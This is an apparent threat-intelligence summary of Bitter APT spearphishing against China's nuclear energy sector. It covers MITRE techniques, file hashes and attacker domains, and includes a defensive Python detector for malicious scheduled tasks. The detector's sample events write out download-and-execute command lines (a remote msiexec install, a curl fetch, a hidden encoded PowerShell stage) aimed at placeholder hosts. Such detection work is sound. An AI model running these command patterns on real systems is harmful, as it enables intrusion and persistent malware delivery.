Intezer traces Bitter APT activity targeting the Chinese nuclear energy sector as part of an Asia-Pacific espionage campaign and ties it to prior Bitter APT tooling, including CHM/Excel payloads and Microsoft Office exploits. The operation uses social engineering with lures impersonating a Kyrgyz embassy, layered with obfuscation and decoys, and relies on scheduled tasks, MSI/PowerShell techniques, and C2 over HTTPS to maintain persistence and exfiltrate data.
Read more: https://www.intezer.com/blog/research/phishing-campaign-targets-nuclear-energy-industry/
Keypoints
- Bitter APT is conducting an ongoing espionage campaign targeting energy and government sectors in Asia, including China.
- Phishing emails impersonate the Embassy of Kyrgyzstan and lure recipients in China’s nuclear energy sector to download RAR attachments containing CHM or Excel payloads.
- New layers of obfuscation and additional decoys are used to hinder analysis and enhance social engineering.
- CHM and Excel payloads deliver persistence mechanisms and download additional payloads, including downloader modules and potential plugins.
- The Excel payload uses an Equation Editor exploit to create scheduled tasks that fetch the next-stage payloads via curl and reveal infected machine names.
MITRE Techniques
- [T1589.002] Email Addresses – Reconnaissance – The actor gathers target email addresses to target with spearphishing emails. Quote: ‘The name and email address used to send the phishing emails is crafted to look like it is coming from an “Embassy in Beijing.”’
- [T1566.001] Spearphishing Attachment – Initial Access – Phishing emails deliver RAR attachments containing CHM or Excel payloads. Quote: ‘We identified seven emails pretending to be from the Embassy of Kyrgyzstan, being sent to recipients in the nuclear energy industry in China.’
- [T1059.001] PowerShell – Execution – The second version of the CHM payload runs its stage through an encoded PowerShell command. Quote: ‘The second version of the CHM payload abstracts the same activity through an encoded PowerShell command stage.’
- [T1203] Exploitation for Client Execution – Execution – Microsoft Office exploits (Excel Equation Editor) are used to execute code. Quote: ‘The Excel payloads simply contain an Equation Editor exploit that creates two different scheduled tasks.’
- [T1053.005] Scheduled Task – Persistence – CHM and Excel payloads create scheduled tasks for persistence and execution. Quote: ‘This activity appears to be a continuation of the tactics and campaign that Bitter APT have been using since at least 2021.’
- [T1218.007] Msiexec – Defense Evasion – Msiexec is used to launch the next stage payloads. Quote: ‘The first version of the CHM file will create a scheduled task that will use the living off the land binary msiexec to execute a remote MSI payload from the C2.’
- [T1218.001] Compiled HTML File – Defense Evasion – CHM files are used to deliver payloads. Quote: ‘CHM files are used to deliver payloads.’
- [T1036] Masquerading – Defense Evasion – Files are masqueraded as legitimate files and scheduled tasks are named after common tasks (e.g., Adobe Updater). Quote: ‘masquerading as legitimate files and scheduled tasks are named after common tasks (eg. Adobe Updater)’
- [T1082] System Information Discovery – Discovery – First-stage payloads fetch computer and user names. Quote: ‘System Information Discovery’ and ‘fetch Computer and User names.’
- [T1071.001] Web Protocols – Command and Control – HTTPS is used for C2 communication. Quote: ‘HTTPS is used for C2 communication.’
- [T1041] Exfiltration Over C2 Channel – Command and Control – Data can be exfiltrated. Quote: ‘Data can be exfiltrated.’
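The techniques above share one chokepoint a defender can watch: a newly created scheduled task whose action is a living-off-the-land download (msiexec pulling a remote MSI, curl fetching a stage, an encoded PowerShell command) under a task name borrowed from a legitimate vendor. The following detection sketch is an added example written for this page, not Intezer's code or tooling. It assumes a simplified key="value" event line per created task (roughly the fields Windows Security event 4698 carries: task name, author, action command line); the sample events, the example.invalid hosts and the encoded command are constructed for the demonstration.

```python
"""Detection sketch: scheduled tasks used as a download/persistence layer.

Assumptions (not from the Intezer write-up): each created task is modelled
as one simplified key="value" line with task, author and action fields.
"""
import base64
import re
from dataclasses import dataclass
from typing import Iterable

# Constructed sample: an encoded PowerShell stage built here so the decoder
# below can be exercised offline; the decoded text is deliberately harmless.
_DEMO_ENCODED = base64.b64encode("Write-Host 'demo'".encode("utf-16le")).decode()

# Constructed events; hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    'task="\\Adobe Updater" author="CORP\\alice" action="C:\\Windows\\System32\\msiexec.exe /i https://updates.example.invalid/u.msi /q"',
    'task="\\Microsoft\\Windows\\WindowsUpdate\\Sync" author="SYSTEM" action="C:\\Windows\\System32\\usoclient.exe StartScan"',
    'task="\\OfficeSync" author="CORP\\bob" action="cmd.exe /c curl -o %TEMP%\\s.exe https://cdn.example.invalid/s"',
    f'task="\\Adobe Acrobat Update Task" author="CORP\\carol" action="powershell.exe -w hidden -enc {_DEMO_ENCODED}"',
    'task="\\Adobe Acrobat Update Task" author="SYSTEM" action="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe"',
]

_FIELD = re.compile(r'(\w+)="([^"]*)"')

# Rule name -> pattern applied to the task's action command line.
RULES = [
    # msiexec executing an MSI straight from a URL (T1218.007 as described above)
    ("msiexec_remote_msi", re.compile(r"\bmsiexec(?:\.exe)?\b.*\bhttps?://", re.I)),
    # download utilities invoked with a URL from a scheduled task (curl in the write-up)
    ("lolbin_download", re.compile(r"\b(?:curl|certutil|bitsadmin)(?:\.exe)?\b.*\bhttps?://", re.I)),
    # encoded PowerShell stage; group 1 captures the base64 blob for decoding
    ("encoded_powershell", re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)),
]

# Vendor names commonly borrowed for task names; a task that names a vendor
# but whose action never references that vendor is treated as masquerading.
MASQUERADE_VENDORS = ("adobe", "google", "mozilla")


@dataclass
class Finding:
    task: str
    rule: str
    command: str  # the action, or the decoded PowerShell when applicable


def parse_event(line: str) -> dict:
    """Turn one key="value" event line into a dict (hypothetical log shape)."""
    return dict(_FIELD.findall(line))


def decode_encoded_command(b64: str) -> str:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16le")


def analyze(lines: Iterable[str]) -> list[Finding]:
    """Run the rules over event lines and return every finding."""
    findings: list[Finding] = []
    for line in lines:
        ev = parse_event(line)
        task, action = ev.get("task", ""), ev.get("action", "")
        for rule, rx in RULES:
            m = rx.search(action)
            if not m:
                continue
            detail = action
            if rule == "encoded_powershell":
                try:
                    detail = decode_encoded_command(m.group(1))
                except (ValueError, UnicodeDecodeError):
                    detail = action  # undecodable blob: still report the raw action
            findings.append(Finding(task, rule, detail))
        vendor = next((v for v in MASQUERADE_VENDORS if v in task.lower()), None)
        if vendor and vendor not in action.lower():
            findings.append(Finding(task, "masquerade_task_name", action))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.rule:22} {f.task:40} {f.command}")
```

The masquerade check is intentionally coarse (a vendor word in the task name with no trace of that vendor in the action); in production it should compare the action's binary path against the vendor's signed install locations rather than a substring, and the legitimate AdobeARM task in the samples shows why the substring test alone is only a starting point.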
Indicators of Compromise
- [File Hashes (SHA256)] Email-related payloads – 5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1, eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e (Email)
- [File Hashes (SHA256)] Email-related payloads – cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179, 8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74 (Email)
- [File Hashes (SHA256)] Additional attachments – 33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799 (Email), 5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc (Email)
- [File Hashes (SHA256)] CHM/CHM variants and XLS payloads – ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1 (Email)
- [File Hashes (SHA256)] Miscellaneous payloads – b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa (RAR), 33a20950e7f4b2191706ddf9089f1e91be1e5384cca00a57cf6b58056f70c96b (RAR)
- [File Hashes (SHA256)] Additional attachments – 7e7e90b076ef3ea4ef8ed4ef14fb599a2acb15d9ce00c78e5949186da1e355cf (RAR), 07504fcef717e6b74ed381e94eab5a9140171572b5572cda87b275e3873c8a88 (XLS)
- [File Hashes (SHA256)] CHM payloads – 06b4c1f46845cee123b2200324a3ebb7fdbea8e2c6ef4135e3f943bd546a2431 (CHM), ded0635c5ef9c3d63543abc36a69b1176875dba84ca005999986bd655da3a446 (CHM)
- [Network] Domains – qwavemediaservice[.]net, mirzadihatti[.]com, coauthcn[.]com